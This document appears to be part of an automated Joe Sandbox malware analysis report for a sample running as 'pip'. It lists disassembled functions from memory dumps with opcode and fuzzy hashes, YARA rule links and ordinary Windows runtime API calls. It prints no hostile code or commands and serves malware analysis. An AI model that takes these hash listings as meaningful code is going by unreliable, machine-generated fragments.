Instruction Fuzzy Hash: 9021F3B1604248DFDB14DF14E580B2ABFB9FF88724F28C66DD8494B256C336D846C662

Uniqueness

Uniqueness Score: -1.00%

Function 0317DB20 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d70b6091a7316b0975a912fec26573b614dedf95c98ca6f8e77fbbc78bc2640f
Instruction ID: f34cff9ac8a766a005f2855049353f9201fe785d22d24e9ff7c2900cb128db2e
Opcode Fuzzy Hash: d70b6091a7316b0975a912fec26573b614dedf95c98ca6f8e77fbbc78bc2640f
Instruction Fuzzy Hash: AE21F3B5504248DFDB14DF14E588F2ABBB9FF8D324F28C6A9D8494B245C33AD446C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0317D7C0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c71eebb06d33f9fba828467c59d1a61bac3dbe5d6dc9892a355235d9ee2d0f9
Instruction ID: 90a7fc11be97a98090f42d71371f1b8f87b968f259c159a2c03956f5ef1dc3d6
Opcode Fuzzy Hash: 4c71eebb06d33f9fba828467c59d1a61bac3dbe5d6dc9892a355235d9ee2d0f9
Instruction Fuzzy Hash: 9621F3B1504248DFDB05DF14E9C0B2ABBB9FF88324F28C66DD8094B265C336D446C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 0317D2BC Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adfa7515acdb6fa3f8a10443027e3501d8e0f26550aafdc509cb786b97c000ea
Instruction ID: 51afd928d95f7b64334048cd2b3b047a6943a275a5507b92c20280107650164c
Opcode Fuzzy Hash: adfa7515acdb6fa3f8a10443027e3501d8e0f26550aafdc509cb786b97c000ea
Instruction Fuzzy Hash: FA21C3F25042489FD704DF14E584B2ABBB9FF8C724F2CC669D94A5B241C73AD446C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 06F80854 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2940861181.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f80000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b804a70226455dbfa10ddd513ea2859c0e0c03d4ff74a6a16ed584c41eed77a
Instruction ID: cef30d27143d1f28a9dde3038f2f14a730981a3fd6c3b247e6374fd28bc5e406
Opcode Fuzzy Hash: 5b804a70226455dbfa10ddd513ea2859c0e0c03d4ff74a6a16ed584c41eed77a
Instruction Fuzzy Hash: B0117035304200AFC745AB6DD898C6E7BFAEF8A61030540AAF10ADB372DA61EC0587A1

Uniqueness

Uniqueness Score: -1.00%

Function 0317D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 144d9b1d7a3314222f1a98d93819bb162e663bb925992e531f72d1f34c554e0f
Instruction ID: 6d0b95d47fd97a8cc4c53e052e62154fb8cea1bc479fc1b399fa7edc170553ac
Opcode Fuzzy Hash: 144d9b1d7a3314222f1a98d93819bb162e663bb925992e531f72d1f34c554e0f
Instruction Fuzzy Hash: 2D219F755093848FDB12CF24D990B15BF71EF4A214F2CC5DAD8498F2A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 018BD49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2907850764.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_18bd000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
Instruction ID: a9b74e8057a71648b21be734c103257238f8a6b20dc5ce214c3e978d952219fa
Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
Instruction Fuzzy Hash: 4711E176504280DFDB12CF48D5C0B56BF71FB84328F24C2A9E9094B257C33AD55ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0317DCD3 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7866d14ea01c69efd4df420b26d0b5de6bae435d5f6f9de9bd2a27242622d90
Instruction ID: 3cf327d0b503f51228c87fe9a094b7bb5044c9771bac744803d7e02ce59bef5e
Opcode Fuzzy Hash: a7866d14ea01c69efd4df420b26d0b5de6bae435d5f6f9de9bd2a27242622d90
Instruction Fuzzy Hash: 4D11D376504284CFDB12CF10E9C0B16BF71FF88314F28C2A9D8494B656C33AD41ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0317DDBB Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad908d0fb984c875fa6a6ba73bcfaf2b777a372c35b0274bff529d88b94ec08c
Instruction ID: e94eb834fb2b01b3fed12d8c8876bdf0332daf03d28ee92b54ce572a0cd0b696
Opcode Fuzzy Hash: ad908d0fb984c875fa6a6ba73bcfaf2b777a372c35b0274bff529d88b94ec08c
Instruction Fuzzy Hash: 69119076504284CFDB12CF14D5C4B16BF71FB88314F28C6A9D9094B656C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0317D893 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b132da1936703ebd146734091a2976c7582b58d84ca7d4cef28a52f45b46dc9e
Instruction ID: d03484b901534d52afd46396074a41aaf235cc338b6cf3071d9f556715ea2e80
Opcode Fuzzy Hash: b132da1936703ebd146734091a2976c7582b58d84ca7d4cef28a52f45b46dc9e
Instruction Fuzzy Hash: 9A119176504284DFDB11CF14E5C4B1AFF75FB88324F28C6A9D8494B656C33AD44ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 0317DB1B Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b132da1936703ebd146734091a2976c7582b58d84ca7d4cef28a52f45b46dc9e
Instruction ID: 135b066f23f1e02a87fac83fdea546ef4bcaca0e3e5751d3adf0f29ed5381382
Opcode Fuzzy Hash: b132da1936703ebd146734091a2976c7582b58d84ca7d4cef28a52f45b46dc9e
Instruction Fuzzy Hash: F811C175504284CFDB11CF14E5C4B19FF75FB89324F28C2A9D8494B656C33AD44ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 0317D7BB Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b132da1936703ebd146734091a2976c7582b58d84ca7d4cef28a52f45b46dc9e
Instruction ID: 48ae31bc3c2dd6a4ac08cb23bb048c8c75ef4eb748b46202a5ae8fc79ef140e3
Opcode Fuzzy Hash: b132da1936703ebd146734091a2976c7582b58d84ca7d4cef28a52f45b46dc9e
Instruction Fuzzy Hash: 9911BF75504284CFDB11CF14E9C4B19BF71FB88324F28C2AAD8494B666C33AD44ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 06F80868 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2940861181.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f80000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef108c19586f359c2d26ba1ef58393f33fefc2541a371e23153e2d827cd1aecd
Instruction ID: e7665cf2c159c6bf175845856dd6ed013a76d6c98498b20e0ff652b9dfd22dcb
Opcode Fuzzy Hash: ef108c19586f359c2d26ba1ef58393f33fefc2541a371e23153e2d827cd1aecd
Instruction Fuzzy Hash: 830148753001109F8748EB6DD898D6EBBEAFF8965034541A9F50ADB371DAB1EC018B91

Uniqueness

Uniqueness Score: -1.00%

Function 0317D2B7 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b0dad9e8fd4a3e13d41bd69c3c6998e87557b223cbf6a29ba03700771bd8b5b
Instruction ID: 26517f3d0693a366ff9c2801c68cf4d39a20e1be88219137578ab15a30400376
Opcode Fuzzy Hash: 8b0dad9e8fd4a3e13d41bd69c3c6998e87557b223cbf6a29ba03700771bd8b5b
Instruction Fuzzy Hash: F611C1B6504684CFD711CF14E5C0719FBB5FB88224F28C6AAD8494B652C33AD40ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 018BD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2907850764.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_18bd000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc6817e00c0603ee08d376772a4aedc2e3c14256e11c9e25f5a98d89ebebe3c
Instruction ID: 3d56fd9f9e5aedb7155aa93f6d9acaaee11b3ea0dad7781036e26cbf49867e2b
Opcode Fuzzy Hash: 3fc6817e00c0603ee08d376772a4aedc2e3c14256e11c9e25f5a98d89ebebe3c
Instruction Fuzzy Hash: E2012071005784BAE7109E5ACDC4BE6BFACDF41328F18C619ED098F346D2399940C675

Uniqueness

Uniqueness Score: -1.00%

Function 032ADBD8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908649519.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_32a0000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f76b518284ddb4f98e8cefcc96c936b312cdbb15a13c110015c672822ba47d
Instruction ID: 389b349cb77d50d3072d246f1a02995b208ecdf00876c815b4e47f6dc27ab925
Opcode Fuzzy Hash: b4f76b518284ddb4f98e8cefcc96c936b312cdbb15a13c110015c672822ba47d
Instruction Fuzzy Hash: E311A2B4D1160ADFCB40DFA9C644A9EFBF5AB48300F5485A59808A3200E7709E818B91

Uniqueness

Uniqueness Score: -1.00%

Function 018BD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2907850764.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_18bd000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e481f4f1c74213f26ac93cd902c26a96d596caae2802fe3e3d3e8d0f4b1ce9ab
Instruction ID: 91ac8d94352436ae083553939353e36bd36370b879ac33dec441acdb8c717bf3
Opcode Fuzzy Hash: e481f4f1c74213f26ac93cd902c26a96d596caae2802fe3e3d3e8d0f4b1ce9ab
Instruction Fuzzy Hash: 42F0C232404680AAE7118E1AC8C4BA2FF98EB41334F18C55AED084F386C2799840CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 032AD980 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908649519.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_32a0000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fef46aa65f89acc968d8b406ff30389b2dc78e6d0688c10cd9f42fb30c5528ac
Instruction ID: 4c292886393be9ce6167031945c4f633806bd21d20aac04fc686de5fb2ad4bd1
Opcode Fuzzy Hash: fef46aa65f89acc968d8b406ff30389b2dc78e6d0688c10cd9f42fb30c5528ac
Instruction Fuzzy Hash: D6F03734D1960AEFCB14DFADD51469DBBF5AF48300F0490A9D80893610EB309A81CB40

Uniqueness

Uniqueness Score: -1.00%

Function 032AD178 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908649519.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_32a0000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8095950ce7276e8fa47163b8cbd658d3c66d38aa02c358ef13f441f25018456
Instruction ID: a13bedc20cc744af3f324e662addba0f7d9108b03617d42232240a2d38a693d9
Opcode Fuzzy Hash: f8095950ce7276e8fa47163b8cbd658d3c66d38aa02c358ef13f441f25018456
Instruction Fuzzy Hash: DAF04434D15608EFCB54EFB9D41869DBFF5AF48701F1498AAD408D3210EB348A80CB90

Uniqueness

Uniqueness Score: -1.00%

Function 032ADAD0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908649519.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_32a0000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e4d475067ef3a411bc0b4ea4c84fa43dad2e0ad5642e1b8f48d22478b1e96c
Instruction ID: 629f70b3062e902f59f48ea7608fda1b19af0feb3a303c73351445b521336d4a
Opcode Fuzzy Hash: 03e4d475067ef3a411bc0b4ea4c84fa43dad2e0ad5642e1b8f48d22478b1e96c
Instruction Fuzzy Hash: 4DF03970929609DFC744EFBDD41AB5EFBF8BF09302F4899A8940893510EB3089C4CA95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6CF484B0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afb731816f587bf68204c0aa5d328f67fb5f98c3ac70d743d771b12582027806
Instruction ID: 58949e3a5651a697fa0ed363dcff2d93ee104620743771e5c7752a85d18e584f
Opcode Fuzzy Hash: afb731816f587bf68204c0aa5d328f67fb5f98c3ac70d743d771b12582027806
Instruction Fuzzy Hash: BD115E72A08609EFC714CF59D841799FBF5FB45724F20862EE819D3B80D735A900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CF56FB1 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

APIs

operator+.LIBCMT ref: 6CF56FCC

Part of subcall function 6CF54147: DName::DName.LIBCMT ref: 6CF5415A
Part of subcall function 6CF54147: DName::operator+.LIBCMT ref: 6CF54161

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: e4b7d92ea449bb5208c8778dd3808f40b59094075b5686c3f675be6f2a4feff3
Instruction ID: 4fb15ece063a75731c1457321fa4f96102ad5728d3e6e88a9eace0ad6f934364
Opcode Fuzzy Hash: e4b7d92ea449bb5208c8778dd3808f40b59094075b5686c3f675be6f2a4feff3
Instruction Fuzzy Hash: 5ED16375D11209AFDF00DFA8C880AEEBBF4EF25314F90816AE615E7790DB319A59CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF4EC9D Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6CF4A2D4,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF4ECA5
__mtterm.LIBCMT ref: 6CF4ECB1

Part of subcall function 6CF4E97C: DecodePointer.KERNEL32(00000014,6CF4A397,6CF4A37D,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF4E98D
Part of subcall function 6CF4E97C: TlsFree.KERNEL32(00000023,6CF4A397,6CF4A37D,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF4E9A7
Part of subcall function 6CF4E97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6CF4A397,6CF4A37D,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF52325
Part of subcall function 6CF4E97C: DeleteCriticalSection.KERNEL32(00000023,?,?,6CF4A397,6CF4A37D,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF5234F

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6CF4ECC7
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6CF4ECD4
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6CF4ECE1
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6CF4ECEE
TlsAlloc.KERNEL32(?,?,6CF4A2D4,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF4ED3E
TlsSetValue.KERNEL32(00000000,?,?,6CF4A2D4,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF4ED59
__init_pointers.LIBCMT ref: 6CF4ED63
EncodePointer.KERNEL32(?,?,6CF4A2D4,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF4ED74
EncodePointer.KERNEL32(?,?,6CF4A2D4,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF4ED81
EncodePointer.KERNEL32(?,?,6CF4A2D4,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF4ED8E
EncodePointer.KERNEL32(?,?,6CF4A2D4,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF4ED9B
DecodePointer.KERNEL32(Function_0006EB00,?,?,6CF4A2D4,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF4EDBC
__calloc_crt.LIBCMT ref: 6CF4EDD1
DecodePointer.KERNEL32(00000000,?,?,6CF4A2D4,6CF795C0,00000008,6CF4A468,?,?,?,6CF795E0,0000000C,6CF4A523,?), ref: 6CF4EDEB
GetCurrentThreadId.KERNEL32 ref: 6CF4EDFD

Strings

FlsGetValue, xrefs: 6CF4ECC9
FlsAlloc, xrefs: 6CF4ECC1
FlsFree, xrefs: 6CF4ECE3
KERNEL32.DLL, xrefs: 6CF4ECA0
FlsSetValue, xrefs: 6CF4ECD6

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 1868149495-3819984048
Opcode ID: 37a71cc7986ba8ed8107078048657081c7cf1150e42c85e94145109aa6f87d7c
Instruction ID: 831c842ad2d769206bf960b581392ff01230b28611e81f25d4cddfac08e41f14
Opcode Fuzzy Hash: 37a71cc7986ba8ed8107078048657081c7cf1150e42c85e94145109aa6f87d7c
Instruction Fuzzy Hash: 84319C31E223149BDF90FF769C08B7ABFB4FB07624725462AE57093A91DB308402DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF0EA0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEF0EF2
std::_Xinvalid_argument.LIBCPMT ref: 6CEF0F14
_memmove.LIBCMT ref: 6CEF0F70
_memmove.LIBCMT ref: 6CEF0F95
_memmove.LIBCMT ref: 6CEF0FA9
_memmove.LIBCMT ref: 6CEF0FDB
_memmove.LIBCMT ref: 6CEF1182
std::_Xinvalid_argument.LIBCPMT ref: 6CEF11B6

Strings

string too long, xrefs: 6CEF0EED, 6CEF0F0F
invalid string position, xrefs: 6CEF11B1

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: d7b199c4cd0642ae995bd823ffb4b463319c1150d25fcd45c56461370134913c
Instruction ID: cb797a2db7df918c43214ef1718f33aa0b759cddeb45383c828372b734cf4c65
Opcode Fuzzy Hash: d7b199c4cd0642ae995bd823ffb4b463319c1150d25fcd45c56461370134913c
Instruction Fuzzy Hash: 72B182B23001489BEB28CE5CCD91A9E77B6EB85354724891CF462CBB41C734ED47CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CF04BA0 Relevance: 15.5, APIs: 10, Instructions: 475COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF04BDC
VariantInit.OLEAUT32(?), ref: 6CF04BE5
VariantInit.OLEAUT32(?), ref: 6CF04BEB
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF04BF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF04C2A
VariantClear.OLEAUT32(?), ref: 6CF04C37
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF05107
VariantClear.OLEAUT32(?), ref: 6CF05117
VariantClear.OLEAUT32(?), ref: 6CF0511D
VariantClear.OLEAUT32(?), ref: 6CF05123

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: d51e9ed8853f2adb26a0844afd3790f3ddd41859ae92e2ef5020b4ca3826d382
